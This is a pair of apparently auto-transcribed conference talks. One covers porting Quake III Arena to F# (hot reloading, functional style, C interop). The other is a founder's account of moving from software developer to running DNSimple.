want to write some logic on the fly here and see if I can do it correctly. This is the cosine. Gosh, what? He must have escaped. Okay, now he's like completely winging out right now. I have no idea what's going on. I just want to slow him down just a little smidge. Maybe even more. 
Okay, now it's starting to feel a little bit better. Oh, baby. There we go. Oh, thank you. So yeah, we can do all kinds of stuff. It's just using a simple, you know, we got the time of the client game. Let's do a cosine over it. So that's why it gets the movement doing this. But this is just a simple example proving that, yes, this is like running F-sharp code. But there's a demo. So back to now, for those of wondering, like, how did this actually work? Like, how did I get this working? Well, there's a thing called the F-sharp compiler service, or Foslin. So it exposes additional functionality for implementing F-sharp language bindings. And so it's a, I'd say it's decently pre-sable and has a pretty simple API to use and really good documentation. And so this allows you to embed the F-sharp interactive and anything that you want and just be able to evaluate expressions and script files of any sort. So to give you the example of how I use this, so looking back at the weapon position that I modified, well, here's the function. It takes C game and returns a tuple of two vectors. So one's position, the other one is angles. That's it. And these types are all completely immutable. So there's no side effects going on in any of this. So in the file, I have to set a mutable variable. Just think of it as a FSX and really it's just going to contain the implementation of the calculate weapon position so I can change it at any time because it's going to look and actually call FSX. And so within the same file, I choose what code I want to compile with and the code that I actually want the FSI or F-sharp interactive to run. And so you see nothing's interactive, but in the else that let mutable, that's actually going to be compiled. Whereas in the actual implementation here, if the interactive, this is where all my logic is. And in that same implementation, the one that's actually outside the if interactive, that's when I actually call the FSX to call the implementation. And this is, I wanted to show this because this is like verbatim from the F-sharp compiler service documentation on how to actually boot up and embed an FSI. It's pretty simple. I just copy and pasted it and it like pretty much worked with one modification to the R, the FSI, EXE. I'm choosing which FSI that I actually want to run that actually works with mono. And so how I detect file changes is just, all right, get the last right time. All right, if the last right time is different, well, we'll just evaluate it. FSI session of Alscrape weapons FSX. And that's it. And if there's an exception, I just eat it. I really don't know what to do. I just eat it. And so this is just where it gets set. So calculate position FSX. I set that with a new implementation of whatever calculate weapon position I have. So that's an example of how I got that working. Now, moving on to really, this is like the core thing I really want to present is like, do you really get benefit at it like using a functional, just doing functional style programming in general, like in doing this? And I want to tell you yes, and I want to prove it to you. So benefits of functional are immutability. So variables, well, really, they're not variables anymore, they're really just values and they just cannot change. And you have referential transparency, and that just means whatever input you give it is the same output that you get. Same input, same output, and that's like, that's what that means. So now let's look at some C. So here's a function called call local box. 
So if you're wondering what this function does, I'll tell you, but it's actually kind of irrelevant. We're just really looking at where functional actually helps you. So call local box really just says, whatever my view frustrum is, am I, do I actually need to draw a model or a mesh that's in my frustrum? Yes or no? And that's just what this function does. So looking at this, there's some local variables here. We've got parameter called bounds. Okay, cool. So now we're in the implementation of this function called call local box. Now you see some things here. Where do these come from? They weren't passed in. They're not local variables. They're global. Who knows where they're defined, but they're using them here. So why is that actually bad? Well, to give you an example, we're going to start out by looking at this specifically. tr.or. So if you get familiar with what this is, tr really is the entire, like, render state of the client. And or is really orientation. Orientation of what? It doesn't care. It's just a place of store orientation for it to use anywhere at once, which is actually not that good. So we're going to figure out, like, what is going on there. So looking at where co-local box is getting called, here's another function called co-model. Got some local variables and some parameters. Okay. And the implementation of co-model, there is no sign of tr.or being set anywhere. But yet, there is co-local box being called, but we don't know where tr.or is actually getting set. We still don't know yet. But we do know that now, co-local box depends on tr.or getting set. Moving on, we go a step further up. There's no function, add md3 services. And in there, it's going to call co-model. But there's still no sign of tr.or actually getting set in this function. So we went, like, one, two, like, few levels out and there's still no place where it's actually getting set still. That makes co-model be dependent on tr.or. Okay. We go up another level. Sure enough, there it is. This is actually where it gets set. You don't actually don't know if it's really getting set, but this is like an out pointer right here and that's where it's going to get set. The comment tells you, but you shouldn't always rely on comments. And sure enough, there is add md3 services. Now, why in the world could they not just pass that in? Why do they have to set it to the global? This makes add md3 services not reusable because it's not even an abstraction at that point. Because it relies on tr.or to be set somewhere. And you didn't know that. How are you supposed to know that? You have to dig through the implementation of what add md3 services does and it calls co-model, then it calls co-local box. Okay, it does all that. But you have to dig through and find out that it's setting that. You would have, it's not an abstraction at that point. It's just, it's broken. So, it depends on that. Okay. And the function signature should really tell you what you need to do. But in this case, it really doesn't. It doesn't tell you that it needed that at all. So what am I doing in fsharp when I'm doing this port? So here's our co-local box again. And notice that I actually have parameter called orientation. So I'm actually passing that in. I'm not bringing any globals into the scope of this at all. I'm actually just passing as a parameter. It tells you what the dependencies are when you do this. Going further up again, we look at co-model. And you start to see that, okay, there's renderer. That's that R right here is really that TR. 
And I'm just passing the entire global state in. So that means I'm taking that unmanaged type TR, copying everything over to immutable type on fsharp that is just a record, and then passing it to this function. So, of course, that's costly. But that's like the proper way to do it right now. But then you start wondering, do I really need to pass in the entire global state of this? Do I actually need to pass all that in? And sometimes you may find out, wow, I actually don't. And that's when you can start refactoring stuff. And it becomes a little bit safer because you have immutability. It's safer than like, hmm, if I try to move this or make it shorter, will that affect something else that mutated this? I mean, it just becomes like a big spaghetti. But if you make everything immutable and reference you transparent, it like, it pretty much goes away. And it becomes actually a lot nicer to refactor and actually starts to feel good. So to recap, benefits of functional. See, it's easier to spot functions that have multiple dependencies. You can see the flow of data through all the functions. When we passed, or what they should have passed is the orientation all the way through those functions because you don't know where the data was coming from or reasons why. So the story isn't even there. So that's one benefit of functional that I found like very, very like pleasing. And refactoring is easier. And having a discipline of purity by doing this, by causing no side effects whatsoever and everything's reference you transparent, which I mean, purity really kind of like means all those, then you get all these benefits. So now I want to get into something else I kind of noticed that was interesting. And doing this port. So there's a type in FCR called discriminated union. And really what this means is think of an enum with data associated with this. And the easiest way you can explain it, which is actually kind of interesting. So let's look at some C. Oh, gosh. Okay, so we got a switch right here. So we're going to figure out what that is. Yeah, face, triangles, and poly. And so if the surface type is a face, then here's how it's going to get the data out of it. The same thing that we're trying to do a switch on. We're going to cast it as this type to get the data out of it. Here, here, and here. Okay. Kind of interesting. Something's kind of familiar there. So what does the FCR version look like? Well, man, there's a fancy switch statement called match. And it's almost the exact same thing. If it's the surface's face, get the data. If it's the triangles, get the data. If it's poly, get the data. But this is all like locked in with FCR. The C version, I mean, you're casting anything you want. You don't even know what you're going to get. But that's just like what they did. And I found that interesting when porting that portion to this actually felt kind of natural. And I didn't have to like think about it a whole lot or do some like weird things. So just similar. But are there any scary spots? Okay. And that's what I want to go into. So let's look at surface type that we saw. They had the face, the triangles, and the poly. It's really just an enum with all this stuff. Okay, cool. And here are the data associated with it. And notice that the very first field is surface type. So that in memory, when we do a switch on the surface type, not on the data, but just on the enum, if we cast it as flare, then we're going to get the data associated with it down here. 
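C# has no direct counterpart to F# discriminated unions, but for readers following along in C#, type patterns give a rough feel for the "switch on the kind, then use its data" shape without the unchecked casts of the C version. The type names below are illustrative and only loosely modelled on the surface kinds discussed; unlike an F# match, the compiler will not warn here when a case is missing.

```csharp
using System;

// A managed stand-in for the surface variants; names and fields are illustrative.
abstract class Surface { }
class Face : Surface      { public int VertexCount; }
class Triangles : Surface { public int IndexCount; }
class Poly : Surface      { public int PointCount; }

class Program
{
    static string Describe(Surface surface)
    {
        // Type patterns bind the data as part of the dispatch, so no cast can
        // silently reinterpret memory the way the C tag-plus-cast trick does.
        switch (surface)
        {
            case Face f:      return $"face with {f.VertexCount} vertices";
            case Triangles t: return $"triangles with {t.IndexCount} indices";
            case Poly p:      return $"poly with {p.PointCount} points";
            default:          return "unknown surface";
        }
    }

    static void Main()
    {
        Console.WriteLine(Describe(new Face { VertexCount = 4 }));
        Console.WriteLine(Describe(new Triangles { IndexCount = 12 }));
        Console.WriteLine(Describe(new Poly { PointCount = 5 }));
    }
}
```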
And so here's like an F-sharp version, how I'm defining a surface. So there's face, triangles, poly, and all that stuff. And then the data associated with it. But C is really just not safe. And here's what I want to show you why. So here's a function, well, not a function. So here's a struct. It's in a completely different file, a completely different context for a completely different reason. Okay, there's nothing in here saying surface type at all. There's no type, even at the first field, which is ident, but it really comes out when you read a model file, you get surfaces, triangles, and other data associated with it. But this in particular, ident, will always be IDP3. But they did something weird when they loaded these model files. Oh, they decided to change it. SFMD3. Now, so that means they're using this struct. It was in a completely different context, completely different file. Now they're going to make it be used as a surface type, which is absolutely dangerous. And actually, it was stuck on this for probably about a day, because I couldn't find where the data was coming from. It was defined in another file, and a totally different project. Oh, no. So they decided, hey, we can just change it, and use it. How clever. But in this, I thought it was kind of interesting to see poor man's discriminated union, poor man's pattern matching, and see if there were things that actually start to kind of feel right, and how the support to F sharp actually started to feel kind of natural. So moving on. Now, this is something that I'm actually still struggling with, is how I'm communicating back and forth between F sharp and C. And it's actually kind of, it can get hairy, but I'm trying to find a solution around that, and I'll get into it. So first, let's look at the project structure. So we have our main executable, F plate three. We have the original C products in the native folder. So that's the original Quake 3C that was, that was on, that's on idSoftware's GitHub. And we have this thing called M, which really is a, it's my own version of a mono abstraction, so I can easily call methods and invoke and do things that I want without having to do all the boilerplate that I need to do when calling mono C, when calling the mono C APIs. And then you have the engine and client game, and this is the F sharp side. Then you have, I have some tools, so this is going to contain like parsing, math, and a couple other things. And then the launcher, which is just the main launcher that calls engine.system. It actually boots everything up. So let's look at how F sharp calls C. It's pretty basic. In.NET you use P invoke to do this. There's platform invocation. And there's nothing extremely interesting about this other than I have this suppress unmanaged security, which makes the call a little bit faster when hitting it. And then sometimes I'll wrap this stuff up so we're not actually hitting the main P invoke method. I'm just wrapping it. And so when calling these C functions, I have to go in and modify those C functions with this M export, M decal. And what actually are these? Now let's look at it. So M export just tells the C call that, hey, somebody might actually call this function from the outside of the dynamic library. That's really what that means. It marks it. And there's different implementations on that and Microsoft Visual C++ and GCC or Clang. They have their own different like versions of that. So wrap it up in the if define and the elift define. And the same goes for M decal. 
And M decal is just a calling convention. There's a couple of different calling conventions. I don't know why blame Microsoft on that because really you just need one which is C decal, which works on GCC. And it's really like the standard. And so that's wrapped up in platform specific stuff too. So that's that. So now how does C call the F sharp code? Here's an example. So this is this M invoke news really just a macro and you give it a assembly name, give it a name space, module and a function. And the result is really the output and the rest of it is just very attic arguments. You can pass any number of arguments you want in there and it'll just take care of it. And so that's how I'm calling it. There's a few things to note here that's actually kind of I don't like very much is you see this thing called QM of QM of and an M object of. This is where I take these C structs and I have to map them to a managed type and then pass them in to this function. So I'm doing all this whole big conversion thing of all these types is actually becoming quite tedious. I mean, I have a couple thousand lines just dealing with this and it's actually like that's most of my time has been doing that rather than writing the actual logic, which has been kind of stinky. But I'm trying to find I'm trying to figure out a better way to handle the problem and I'm actually trying to find time to do it. The M object has arg just the quickly over it. It's really not that important. All it does is all right if the if the type was a struct, we need to unbox it. That's really all its job is doing because if I want to have something as a reference type and I want to change it to a value type, I want everything to just still work. And so this is just like boilerplate that I just have to do. So now I do all this stuff based on conventions. So these are a bunch of more, more macro stuff that I don't like either because I'm actually just blow away like almost like all that eventually. But this is just what I chose and this is just like the path I decided to go. But you live and learn. But these conventions will look for a module say of VEC 3 and look for these particular function names called of native pointer and to native pointer of native pointer takes a C struct VEC 3 and converts it to a F sharp idiomatic type. And then to native by pointer really just takes the F sharp idiomatic type and puts it back to an unmanaged. And so I do that all within the same module. So all that mappings are done within here and all done in F sharp. So here's just something like this is what you have to do in order to get a method. Bunch of stuff. Okay. And before I get into this, I just want to show what these how these functions actually getting called. Hey, look, there's co-local box. So we're kind of familiar with that a little bit. So have this if zero around it. So this is the old C code that was there. I just have it basically not commented out. I can just switch it to one and it will run the C code. Otherwise, it will run M invoke. It will run this invoke new. So that's how it works. So any code that's in C still calling co-local box will forward that to the F sharp function in invoke new and actually run that logic. So I just wanted to show like where like what what's going on there. Okay. So now how is the the math side of this stuff done? It's like, okay. We got our vector three. Now, this is me being completely naive. I didn't even know anything about math. I actually started doing this, but I really wanted to learn the math. 
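The calls from managed code into the native engine use the standard .NET P/Invoke machinery, which looks much the same from C# as from F#. A minimal sketch follows; the native library name is illustrative and not taken from the real build, while the attributes shown (DllImport, CallingConvention.Cdecl, SuppressUnmanagedCodeSecurity) are the pieces the talk mentions.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Security;

static class Native
{
    // The library name here is an assumption for illustration; Sys_Milliseconds is a
    // simple int-returning, argument-free function, which keeps the marshalling trivial.
    // SuppressUnmanagedCodeSecurity trims per-call security checks, as noted in the talk.
    [SuppressUnmanagedCodeSecurity]
    [DllImport("quake3", CallingConvention = CallingConvention.Cdecl,
               EntryPoint = "Sys_Milliseconds")]
    private static extern int Sys_Milliseconds();

    // A thin wrapper keeps the raw P/Invoke signature out of the calling code.
    public static int Milliseconds() => Sys_Milliseconds();
}

class Program
{
    static void Main()
    {
        // Requires the native library to be present and to export the function, of course.
        Console.WriteLine(Native.Milliseconds());
    }
}
```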
So I just had to start building my own. It's like a good way to learn, but probably you shouldn't use it. Only I should. So our vector three type, then we have all our, you know, standard functions for vector three dot product cross product length, length squared normalizing. But one thing to note about a feature in F sharp that like I do enjoy by trying to abuse a lot is inlining. What inlining does is it takes whatever implementation of one of these functions are and wherever you call this, it'll just actually use the implementations to have calling the function. So you get rid of the function overhead and you get rid of all the the parameter types being copied. So there's there's performance benefit gain that you can get from that. So if you didn't say inline adopt product and you're doing 100 million calculations on it, it's going to take you like 200 milliseconds. But if you inline it may take you 60. All and all you had to do is put inline. And so that's something that's that I actually kind of enjoy thinking about. And here is using units of measure. One thing I actually hit at one point. I was trying to figure out does this function take degrees or is it take radians and I had like I had no idea. I found out actually took degrees. The later converted onto radians. But using units of measure, I can like type safe that. So whatever they pass in, you know, if it's degrees, they pass in degrees and whatever implementation that function is, it'll take care of it such as a lax this angle and rotate around point. It's just like showing an example. It's not completely terribly important, but it's just kind of simple. Okay, and how I'm parsing binary. So not getting too much detail, but I just wanted to show. I'm using something very similar to f parsing. If you don't know, I don't think you're familiar with, but I'm really what I'm here. I'm doing is I'm representing all the the reads for parsing is really a computation. So when you want to actually use the logic such as something like this, you don't actually see the stream dot read stream dot that stream dot that. Really, I'm just representing this as a computation here where you don't have any of that noise. It's like, yes, I know I'm going to use stream that read. I know that here you don't have to just kind of like write what you want and then return the type of structure that you want back, such as P triangle. All right, pipe three. I want to get three in 32s and I want to return me an empty three triangle of whatever values the three in 32s gave me. That's all it is. And that's all I have to represent it as. So this is actually kind of nice. And it's an example of like how you run, like say the model parser. It's like, all right, parse bytes function called parses. Throw in the data, takes care of it. It's, again, not too terribly important. We just wanted to show it. It's kind of like the main implementation of where the things actually start. So it looks very similar to what you saw before. Pipe three, we're going to get some data. We're just going to turn frames, tagging services, and we're going to give it the structure. And then here I have testing against this using a FS unit and in unit. And just taking to make sure it actually like works. So now let's see. I want to get into probably not a whole lot on this, but I do want to show something I've been working on most of my time. It's a library I've been creating called Ferop. And what this library will do is allow you to have inline C and F sharp. 
And then it will know how to compile it when you compile your F sharp code. So compile the C, generate the proper P invoke methods, and just use it idiomatically. So to show you an example of this, I've now switched to OSX. This is using Xamarin Studio and F sharp. So something of how this thing works. I define a function called init and it's going to turn me a application. And then here's the C that I've written. So inline C. I'm going to compile this and run it. It'll know to compile the C and generate me a dynamic library. And I'll get something like this. So this is using Ferop F sharp and just something that I've actually learned from Matthias on Fractals, which is I kind of took it a little bit further. So this is actually kind of neat. So I'm trying to solve the interop problem that I'm having and dealing with all the types and trying to figure out a really good fit because right now I'm doing a whole, whole lot of boilerplate and need something that like just kind of fits and works together. So that's why I started doing stuff like this. To show you more what I'm doing. So this is actually using a, this is the utils library that I had. And this, so I'm trying to figure out how to load a model file, use openGL33 and just show it on the screen so far. I've only gotten like some triangles that are red so far, which is okay. This actually just took me probably about five days of like a couple hours to get some triangles on the screen. At one point it's, openGL takes a column major storage matrices and I was using row and it completely threw me off guard and I realized I had to transpose it. So that was like eight hours of like complete bashing my head against the wall. So that's an example of using a fair op. So you see I have some of the NaVo code here. And so I'm actually trying to actually use this and actually have fair op integrated with fquake3 running some openGL calls. And with this I don't have to rely on another person's bindings. I can just use the C that's already updated and not have to wait for the bindings to get updated for it. I can just use it here. And so that's why I built it so I don't have to worry about bindings because some of these bindings people don't get paid to do it and so it's not going to be updated all the time. And so I needed to find like an alternative around it. And plus this will help me do the port. So that is an example of that. As of fair op. And so I have a couple links. So there is my github for the project fquake3. And then there is an interesting site by Fabian on a quake3 architecture that I've actually read multiple times to figure out what in the world am I actually looking at. And so that actually really, really helped me a lot. So this has been an interesting journey getting to this point. I'm not sure where this project will go. Like when I've given the time that I have, which I actually don't have now, but I think I have some time for questions. So if anybody has any questions or you want me to show something else on this, just like you can let me know. Yes. So you said you've got about 5% for it. Can you talk a little bit about how you selected the parts that you've imported so far? Okay, yeah. Most of the 5% is done in the rendering because I chose that because I don't know anything about OpenGL and graphics rendering. And so I'm like, okay, well, I want to learn fsharp and rendering all at once. Well, it's one way to figure out, you know, will this actually work in the real world? And so it's like, okay, it does. 
So I chose that just to learn it and it's probably going to be the most difficult part. If I can get that done, like all that really heavy low-level stuff written in fsharp, then all like the high-level logic that's actually in C in the engine, like will be a whole lot easier to just port over since I got all that low-level stuff all done and taken care of, especially cross-platform specific stuff. Because it was like, there was probably about 15,000 lines of code per OS dealing with all the cross-platform stuff. And so I'm basically going to be like, okay, you're gone. You're gone. Replace it with an fsharp or a.NET library that already exists that works in all platforms. And so that's like, I just get rid of like thousands and thousands of lines of code with one.NET library, which would be really interesting to see. But that's the path I don't know how far I'll get. I at least want to get the rendering done someday, at least. But once it's done, I don't know where I'll go from there, but it's definitely a journey. All right. Oh, yes. It is a very, very important. Well, thinking about the garbage collectors is probably very, very important. Even like right now, while things are so slow, the garbage collectors are probably getting hit a lot, because I'm making copies of giant structures to a managed type and then back. And so that has a really big performance relation with that. There's also when to use an array versus a list, that sort of thing when using fsharp. And that had actually performance impacts when using large data sets, where we actually really needed to use an array instead of a list. But it's like, it's one point that I hit. Yes. So, now in the conversion, you move between C and fsharp, and I just like you're taking a back to 3D back to a C to fsharp, and now you create a new back to that. So, you're creating new objects to just take this as a.NET sort of map. Yeah, yeah. At some point, actually, it did have something like that. When I was testing performance of like value types and reference types, like I actually had a vector 3 at one point being a reference type. And so, when doing things that have like the same memory, like it becomes broken when you use a reference type. And so, that's why I'm doing the mappings manually right there, because if I want to flip a switch and use a reference type, I can without breaking any existing code. So, that answers it. But in the end of everything, I probably would want to do it in the same memory space instead of doing it manually. Because that one thing would be a lot easier to do and probably be more efficient by a little bit. Probably not by a whole lot if that answers your question. Yes. How do you get your motivation up when you're trying to get something done and you keep getting stuck in the boilerplate? Sorry. So, I have to go to the store. I have to buy a six pack. No, no, I don't have to do that. It's the motivation to do stuff like that is really hard. It's more like I'm just trying to plow through it as much as I can to get something working and then hopefully have something to show. That's the motivation that I have at that point. Some days I had one problem in particular that was completely driving me nuts. I had to actually walk away from it for a couple of days and then come back to it and then go, oh, I didn't need to do all that boilerplate work. I could have just done this or that. So, a lot of boilerplate could probably just be ripped out with something simple because I get stuck and actually create worse code. 
That's not very motivating. Motivation, I guess, really, it's a really good question. I really like doing it and I really want to see, you know, does F-sharp or functional programming actually do benefit real giant things like this instead of Fibonacci sequence or something like that? But that's why. Yes? Was the functional programming group in Nashville part of that motivation? I guess what I say is that's the first time I actually presented it out there. That's when Brian was like, where does this come from? Okay. Well, thank you. Thank you. Thank you. Thank you. Thank you.
|
FQuake3 is a project started by Will as an attempt to port id Software’s Quake III Arena to F# and to figure out how functional programming can be applied to game engines. The project is less than a year old, and has been worked on by Will in his free time. The talk will discuss Will’s journey to finding F# and why he started this project. The project structure, demos, code examples, and comparisons will be presented along with a live code example of how to port a C function to F#.
|
10.5446/50786 (DOI)
|
Are we good? Hey, there we are. We have sound. Come on in. Come on. We're going to make it here. So, first of all, just in case you're worried, I probably won't go the whole hour, so you'll be able to get in the beer queue early. I plan my talk this way because I think of you when I prepare my talks. So, what we'll do is I'll go through my material and then we can take the discussion out into the main hall, get a drink if anybody wants to talk further. I am an open book today around this topic. So, first of all, my name is Anthony Eden for those who don't know me. I run a little company called DNSimple and it really is a little company. And today I want to talk to you a bit about the voyage that I've had from being a software developer to running my own company and what I've learned along the way and some of the things that you might want to, if you're interested in becoming an entrepreneur and starting your own company, might want to look into. And hopefully, I'll give some of you who are on the fence, ooh, do I really want to run my own company, some excitement that says, you know what, I'm ready for this. I'm ready to take the step into entrepreneurship. I'm totally down with that. And hopefully it will encourage you. So, first some history. I've been building software since 1995 when my brother came to me and said, I've got to show you this really cool new thing. It's called the World Wide Web and I think it's going to be big. And he came to me and told me this and I looked at it and I was like, oh, this is pretty cool. I can put up pages with pictures. And so I started doing that and very quickly got bored with just these static pages and said, I need some way to take some information down and send it to email. And thus, I started reading 21 Days of Perl. And that was my introduction into programming. Prior to that, I had played around a little bit with BASIC programming on VAX/VMS. You know, it's at the house. Everybody has had a VAX at their home, right? Back in those days. Anyways, so I played around with Perl, started building things with Perl, never actually got into computer science. My degree is in music composition, but I was always really intrigued about building stuff. I'm a creator, all right? And this is going to come back and it's going to make sense later on how this all plays together. If you all want to come in, you're welcome to. There's still more seats in here. You don't have to stand. So building software since 1995 and very early on was thrust into the role of CTO, which is really silly because I was not CTO material. I was CTO by title, but I absolutely had no idea what I was doing. So what I learned along the way is that I would have the opportunity to help screw up many, many companies and play my part in it. And oh, I did. There were lots of companies out there that I took part in that messed up in one way or another. And this is actually an important part of the voyage because when you start running a business, you don't have all the answers. In fact, you'll never have all the answers. You will make mistakes. And that's okay. It's the same as with programming. You take missteps while you're trying to solve a problem in programming, all right, when you're trying to actually build a system and then you step back and you think about it and you refactor, all right, and then you have a test that says, okay, this is what we want to prove is working. You have some code that's running. You refactor. This is a constant exercise. And the same applies to business.
You don't have everything right in the beginning. So I learned along the way lots of different things, lots of different ways to fail. One example of this was the first company where I was really involved in as a programmer was Signature Domains. This was back in 1999 during the deregulation of the.com TLD. This is the first TLD that went from having a monopoly, controlling it, to having multiple companies control it. And we made a lot of money in the first two months of business. We made probably a million and a half in the first two months of business. And this was like two guys sitting in an art studio, all right, and it was crazy. It was crazy times, crazy times. And so this had, we could have been a major company now. We could have succeeded in wild and spectacular ways. And I could have a house in Hawaii and be driven, driving a Ferrari. But alas, that is rare. So what happened was is that we didn't know how to take that money we made in the beginning and turn it into more money. We didn't know how to make the, invest back in the company and make it grow. And over the next couple of years, I watched as the founder, who was the one who had control of the money, put it into projects that actually didn't do much for anyone. And so we slowly went away. And this, we were going through this, it was 1999, 2000. And as you probably are well aware, we had the big dot com, the big bubble burst, if you will. And everything went to hell. We, basically I worked for three or four years, just sort of sliding by. And we lost all of the goodwill that we had in all of the money. The second failure that I contributed to came after leaving signature domains. And I went to a company, to work on a company called dot mp. Again, a startup. And in this sense, not a startup like you think, like a funded startup, what you see today, it was essentially a company that was self-funded and trying to grow really fast. Like we were thinking, oh, we're going to be the next thing. You guys can come and sit down if you want to. There's more seats. So we had a really, the one thing that was cool about what we did is we had an early understanding that mobile was going to be big. This was back at a time when we were using, what was that markup language called? The WML? No. What was it? It was like a... No, no. Before that, it was like a markup language for mobile devices for like actually controlling Nokia's. Yeah, that was one of these. It was something like that. It was like a WAP or something. It doesn't matter. The point was is that we had this sense that mobile was going to be big. And this was a long time ago. This was back in, well, before the invention, before the iPhone came out, before smartphones were really taking off. It was just at the early days of smartphones. Nobody thought you'd be running a full-blown web browser with the same kind of processing power that you might have in a normal computer. So we were ahead of the curve. But the problem is we were too far ahead of the curve. So that was another thing that I learned really quickly. It's one thing to have a great idea, but great ideas have to collide with great timing to actually build something that's going to, especially something that's going to hit the consumer space, which is where we were targeting. All right? So failure number two was that. And then the other thing was we didn't have the ability to stay the course. 
So if you're going to come into a technology early with your business, you're going to have to stay the course until the rest of the world starts catching up with you. And then you can be a leader. And then you can be established. But we couldn't stay the course. Now, there are lots of reasons we couldn't stay the course, including some very serious issues with one of the founder and his family. But the point was is that we had not set up a company that would survive beyond the founder going away and having to do something else. We had not built a company. We had built a piece of software and a project. All right? And there's a big difference between the two of them. After this, I said, screw this startup stuff. I'm going to go work for the biggest company in the United States, which is essentially what the US government is. When you start working for them, you're working for the largest, one of the, like, the largest entity in the US. And that actually taught me a lot as well. My role had a moderate success. I was PMing projects that, you know, were $5 million projects. In government, that's pretty tiny. But for me, I was like, man, look at the, this is amazing. And I hated everything about it. Like, I hated what I was doing. I hated this idea of taking more money from the public and then trying to create something and just trying to make sure that I kept getting the next contract for the company I was working for. So I did learn an important part, though, during that. And I learned how to sell, how to propose ideas, how to stick with a potential customer until we got them to buy. All right? So another good lesson that comes out of, came out of it. Went back and tried to do.mp again. Take two. We actually got money this time. We had some angel investors who gave us, like, a million and a half dollars. We went back and said, oh, man, this is going to be awesome. We have so much money. We're going to hire a team. It's going to be the best thing ever. And we started building and we focused on building this product that did everything for no one. And that was another great lesson to learn. All right? I learned at that point that we should have built something simple just to test. Put it out with some of our potential customers. Said, what do you think of this thing? Do you like it? Is it useful? Does it solve your problems? Again, this was in the consumer space, so it was even more important because there was going to be a race, at least so we thought. Turns out that we were actually in a space that had that nobody ever did very well in. A couple companies got bought out. And the other thing that I learned during this process was that you have to start charging money early on in the process. Otherwise, your company dies. Companies live and breathe on cash flow. That's what makes a company go. You put money in. You get cool stuff out. You don't have money coming in. No cool stuff comes out. Everybody goes broke. That point, I said, okay, I've done the government thing. I've done the startup thing. I'm just going to freelance for a while. You know, be a gun for hire. Now, at this point, I had been programming the entire time. I had been, I had used Perl. I had used Java. I had developed systems in Ruby at that point. I had written things in Python. So I had got, I had enjoyed being a programmer. I love building stuff. I love being a programmer. But I also love being able to support my family and have money coming in. 
So I said, okay, I'm going to do this for a while and see what freelance contracting looks like. When you start freelancing, there's a couple things you learn early on. One, you have to get good at managing your own time. Because it's very easy to say, oh, I'm, you know, I'm billing by the hour. So I'll make up my hours near the end of the week. Instead, I'm going to go watch some TV or a movie or play some video games or maybe go out or whatever it is. And in reality, when you're charging by the hour, if you don't work those hours, you don't get paid. And so it was important to learn to manage my own time. And that's a really good thing to know how to do as well. So during that freelancing part, I learned to manage myself and also learn to go out and find new customers. Sometimes they would drop in my lap. Oftentimes I would have to use my network. But the point was, is that I started to learn to build out this network of customers that I could come back to. So that lasted for a little while. Then I went to work for this tiny little company, Living Social, which at the time was sucking up all these developers in Rubyland. And I did that because I was kind of tired of the rat race of trying to find more money and more contracts and things like that as a freelancer. I was tired of working by myself. I was tired of getting crappy projects and having to pick up like after other people's mistakes. I said, okay, I'm just going to go do this for a while. So Living Social was at the time like a startup but not. It was a absurdly funded startup. So it had all the problems of a startup as well as all the problems of a big company. Thousands of employees, lots of investment money, but not necessarily doing very well in terms of profit, say. And maybe a less than successful business model. But it did give me the chance to work with a larger team and to see some people that I really respect and learn from them how they build teams, how you deal with quickly growing teams, these rapid teams, things like that. So that takes us up till today. At this point, I had been doing some closure there, some more Ruby, things like that. It was great. And in 2010, I had was actually, before I left, before I joined Living Social, I said, I'm going to start my own thing. And my approach was going to be I'm going to take the safe route. I'm going to have my thing on the side and then I'm going to do the other work. So I was going to balance the two of them. And it's actually a really good approach for building a company because you have the safety of your day job or your contracting and then you have the pleasure and the time to build this thing on the side. Now, I'd also already learned to try not to build something that had everything for everyone. So that was a lesson I already learned. Had I not learned that and I've seen people do this before, I could have very easily just spent all my time building something instead of launching. But I'd already learned that lesson so I launched the product in July of 2010 and just started building up a customer base. And one of the best ways to start building up a customer base when you have a small company like this is to talk to your tribe. The idea is that you probably have people around you that have similar needs to you, all right, or have needs that you're aware of, acute needs, problems that need to be solved today. 
And so I spoke to my tribe and I, through Twitter and things like that, I said, hey, what do you think about what this is doing, what we're doing here? Is it interesting? Is it something, would you like to pay money for it? I already started charging money from day one. And it slowly, slowly, slowly started building up a little bit of money coming in and all the while working so everything was good. So as I started doing this, I said, this is what I think that I'm going to do. I'm pretty certain I'm going to spend all my time writing software, right? That was what I figured would happen. As you can imagine, what I actually do and what I have actually done for a long time is much different than that. I have to generally manage the financing and accounting. Granted, I have, you know, people that help do taxes at the end of the year. I have contractors. But as the owner of the business, well, as anybody in the business, if you don't know how the money flows, you don't know how your business is doing, whether it's doing well or not doing well. So you have to understand both, do I need to get money from somewhere, a loan or some sort of cash coming in or a line of credit or whatever it might be? And then once I have that, I need to track all the money coming in and out to figure out, am I going to be able to keep my head above water and pay back the loan or whatever it may take? So, finance and accounting; the second thing was sales. I had to get out there and keep finding new customers, keep finding people. Now, eventually, you create a flywheel in any successful business where your customers refer other customers, you have things that bring in additional customers, but you still have to understand how to sell. Selling is a huge, huge skill that's important. You have to understand marketing. You have to understand product management. You have to understand customer service. You have to do strategy. So you have to figure out where you're going in the long run, not just this month, not just this year, but what's the big goal of the company? Where do we want to see sales in three years, five years, things like this? And I say us, and it really was only two of us for a long time. But that's how I had to think. I had to think, I had to imagine I'm building a company here that I want to last. And notice I've never said I'm building a start-up because that's not what this was. This was a company that was going to last. That was my goal. I want to build a company that survives, that is a good company that I can have people come work for. I also had to do what is, I was looking for a better term for this, how to build teams and how to help make sure that your employees and your teammates are happy and motivated, how to run the systems. And then finally at the bottom I was writing software. So all of these things are pieces of what you have to do and they're the skills that you need in order to actually build a successful business. All right? Like I said, finance and accounting, you have to understand where the money flows, sales, you have to be willing to sell, marketing, you have to understand how to deliver the message of what your product fixes because a good product fixes a problem that people have. All right? A really good product is like an aspirin. You want to actually fix a pain that somebody is having right now. You find those pains and people will give you money to fix them for them in an efficient fashion.
